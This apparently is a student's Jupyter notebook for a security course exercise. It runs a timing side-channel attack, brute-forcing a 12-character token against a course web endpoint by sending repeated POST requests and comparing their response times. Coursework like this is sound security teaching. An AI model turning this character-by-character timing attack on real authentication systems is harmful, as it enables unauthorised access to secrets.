In [1]:
import time
import requests as req
import itertools as it
from tqdm import tqdm_notebook as tqdm
import numpy as np

In [2]:
chars = [chr(ord('a')+i) for i in range(26)]
chars.extend(str(i) for i in range(10))
chars.extend([chr(ord('A')+i) for i in range(26)])

''.join(chars)

'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'

In [3]:
url = 'http://com402.epfl.ch/hw5/ex3'

In [4]:
duration_hist = {}

In [5]:
messages = set()

In [6]:
s = req.Session()

In [7]:
def generate_token(start_string='', length=12):
    n = length - len(start_string)
    return start_string + '#' * n #''.join(next(it.product(*[chars for _ in range(n)])))

In [8]:
def payload(token):
    return{'email': 'gregoire.clement@epfl.ch', 'token':  token}

In [9]:
def time_request(token):
    pload = payload(token)
    start = time.time()
    resp = s.post(url, json=pload)
    duration = time.time() - start
    m = resp.content.decode()
    if resp.status_code is 200:
        print('DONE!!!! CONGRATS!!!!')
        print('ex2 = "{}"'.format(m))
    else:
        if m not in messages:
            messages.add(m)
            print(m)
    if token not in duration_hist:
        duration_hist[token] = []
    duration_hist[token].append(duration)
    return duration

In [10]:
generate_token(), len(generate_token())

('############', 12)

In [ ]:
only_hashtag_time = [time_request(generate_token()) for _ in tqdm(list(range(21)))][1:]

My life is a perfect graveyard of buried hopes


In [ ]:
mean = np.mean(only_hashtag_time)
median = np.median(only_hashtag_time)
std = np.std(only_hashtag_time)
min_ = np.min(only_hashtag_time)
max_ = np.max(only_hashtag_time)

mean, median, std, min_, max_

In [ ]:
time_per_char = median / 12
def expected_time(n_chars_found):
    return (12 - n_chars_found + .5) * time_per_char

expected_time(1)

In [ ]:
for _ in range(5):
    for c in tqdm(chars):
        chars_found = '' + c
        token = generate_token(c)
        duration = time_request(token)
        if duration < expected_time(len(chars_found)):
            print(c, duration)

In [ ]:
def show_stats():
    duration_medians = [(token, np.median(h)) for token,h in duration_hist.items()]
    for k,v in sorted(duration_medians, key=lambda x: x[1]):
        if k is generate_token():
            print('>> all false I guess <<')
        print('{} {:0.2f}'.format(k, np.median(v)))

In [ ]:
show_stats()